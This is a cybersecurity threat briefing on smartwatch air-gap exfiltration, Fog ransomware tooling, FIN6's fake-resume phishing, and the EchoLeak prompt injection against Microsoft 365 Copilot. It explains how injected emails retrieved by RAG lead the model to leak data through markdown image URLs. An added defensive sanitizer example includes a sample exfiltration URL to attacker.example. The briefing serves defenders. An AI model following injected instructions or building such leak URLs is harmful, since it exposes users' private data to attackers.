Malware Activity
From Wearable Devices to Sophisticated Ransomware Tactics
Recent cybersecurity research reveals a troubling evolution in attack methods, highlighting both the ingenuity and danger posed by modern threat actors. The "SmartAttack" technique demonstrates how compromised smartwatches can covertly extract sensitive data from air-gapped, high-security systems via Bluetooth, exploiting seemingly benign consumer devices to bypass traditional defenses. Simultaneously, ransomware operators are adopting advanced, stealthy tactics by leveraging legitimate open-source tools and employee monitoring software like Syteca, along with exploiting vulnerabilities in VPNs and backup systems. Their use of familiar utilities such as PsExec, Impacket, and the GC2 backdoor illustrates a strategic shift toward blending malicious activity with legitimate processes to evade detection. These developments underscore the critical need for organizations to rethink security protocols, especially concerning interconnected devices and the use of legitimate software, as cybercriminals continue to escalate their sophistication and reach. CTIX analysts will continue to report on the latest malware strains and attack methodologies.
- BleepingComputer: SmartAttack Uses Smartwatches To Steal Data From Air Gapped Systems (article)
- BleepingComputer: Fog Ransomware Attack Uses Unusual Mix of Legitimate and Open Source Tools (article)
Threat Actor Activity
FIN6 Targeting Job Recruiters on LinkedIn with Malware-infected Fake Resumes
The cybercriminal group FIN6, also known as Skeleton Spider, has adopted a new tactic by posing as job seekers on platforms like LinkedIn and Indeed to distribute malware through fake resumes. This marks a shift from their traditional focus on stealing payment card data from point-of-sale (POS) systems in the hospitality and retail sectors. In their latest campaign, FIN6 engages with recruiters, builds rapport, and then sends phishing emails that lead to the deployment of the MoreEggs backdoor malware. The phishing emails are crafted to bypass security filters by requiring recipients to manually type URLs into their browsers, which direct them to landing pages mimicking personal resume portfolios. These pages, hosted on trusted cloud infrastructure such as AWS, use traffic filtering and CAPTCHA to ensure only human recruiters are targeted. Once verified, the site delivers a malicious ZIP file containing the MoreEggs malware, which is sold as malware-as-a-service by another group known as Venom Spider. MoreEggs facilitates credential theft, system access, and subsequent ransomware attacks. FIN6's use of AWS infrastructure and GoDaddy's domain privacy services adds layers of obfuscation, making it difficult for investigators to trace and dismantle their operations. The group has been operational since at least 2012 and has previously used Magecart JavaScript skimmers to target e-commerce sites. The campaign highlights the effectiveness of low-complexity phishing attacks when combined with advanced evasion techniques and reputable cloud services. AWS has stated its commitment to disabling prohibited content and encourages the security community to report any suspected abuse.
Vulnerabilities
EchoLeak and Zero-Click AI Exploits: Unveiling the Hidden Threats in Microsoft Copilot and LLM Architectures
EchoLeak is a newly discovered zero-click AI vulnerability in Microsoft 365 Copilot that enables attackers to silently exfiltrate sensitive internal data without user interaction by exploiting a Large Language Model (LLM) Scope Violation. Identified by Aim Labs/Aim Security and patched server-side by Microsoft in May 2025, the flaw, tracked as CVE-2025-32711 (CVSS 9.3/10), leverages prompt injections embedded in seemingly benign emails that bypass security filters and are later retrieved into the AI's context by the Retrieval-Augmented Generation (RAG) engine. This causes the LLM to extract privileged information and leak it via markdown-formatted image URLs or trusted Microsoft Teams and SharePoint links. Though not exploited in the wild, EchoLeak exemplifies a new class of vulnerabilities that weaponize helpful AI features into silent attack vectors. The attack's automation potential and ability to operate without user behavior make it particularly dangerous in enterprise environments. The broader article also explores related threats to the Model Context Protocol (MCP), including Full-Schema Poisoning (FSP), advanced tool poisoning attacks (ATPA), and DNS rebinding techniques targeting localhost MCP servers via deprecated Server-Sent Events (SSE). These findings expose critical architectural blind spots in LLM-integrated systems, emphasizing the urgent need for improved prompt filtering, input scoping, output sanitization, and strict trust boundary enforcement in AI-agent design and infrastructure.
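As an added illustration of the output-sanitization step the paragraph calls for (example code written here, not from the article, Aim Labs or Microsoft), the function below checks markdown image and link URLs in model output against an assumed allowlist of trusted hosts and flags URLs whose path or query carries an encoded-looking blob, since an auto-fetched image URL is the leak channel described. The allowlisted host names and the sample model output are constructed for the example.

```python
import re
from urllib.parse import urlparse, parse_qsl

# Constructed allowlist (assumption): hosts the deployment trusts for images and links.
ALLOWED_HOSTS = {"contoso.sharepoint.com", "teams.microsoft.com"}

# Markdown image ![alt](url) or link [text](url); group 1 holds "!" for images.
_MD_URL = re.compile(r'(!?)\[([^\]]*)\]\(\s*([^)\s]+)[^)]*\)')
# A single path segment or query value this long with no structure looks like smuggled data.
_MIN_SUSPICIOUS_LEN = 24

# Constructed sample of model output containing one untrusted image and one trusted link.
SAMPLE_OUTPUT = (
    "Summary of Q3 plans.\n"
    "![status](https://attacker.example/img.png?d=dGhpcyBpcyBjb25zdHJ1Y3RlZA)\n"
    "See [the deck](https://contoso.sharepoint.com/sites/finance/q3.pptx)."
)


def _host_allowed(url: str) -> bool:
    host = (urlparse(url).hostname or "").lower()
    return any(host == h or host.endswith("." + h) for h in ALLOWED_HOSTS)


def _carries_payload(url: str) -> bool:
    parsed = urlparse(url)
    values = [v for _, v in parse_qsl(parsed.query, keep_blank_values=True)]
    values += parsed.path.split("/")
    return any(len(v) >= _MIN_SUSPICIOUS_LEN and re.fullmatch(r"[A-Za-z0-9+/=_%-]+", v)
               for v in values)


def sanitize_llm_output(text: str):
    """Return (clean_text, findings). Images to non-allowlisted hosts are removed outright
    because a renderer fetches them with no user action; links are defanged; any URL whose
    path or query looks like an encoded blob is reported even on an allowlisted host."""
    findings = []

    def _replace(m):
        is_image, alt, url = m.group(1) == "!", m.group(2), m.group(3)
        allowed, payload = _host_allowed(url), _carries_payload(url)
        if allowed and not payload:
            return m.group(0)
        findings.append({"image": is_image, "url": url,
                         "allowed_host": allowed, "payload": payload})
        return f"[image removed: {alt}]" if is_image else f"{alt} (link removed)"

    return _MD_URL.sub(_replace, text), findings


if __name__ == "__main__":
    clean, found = sanitize_llm_output(SAMPLE_OUTPUT)
    print(clean)
    print(found)
```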

© Copyright 2025. The views expressed herein are those of the author(s) and not necessarily the views of Ankura Consulting Group, LLC., its management, its subsidiaries, its affiliates, or its other professionals. Ankura is not a law firm and cannot provide legal advice.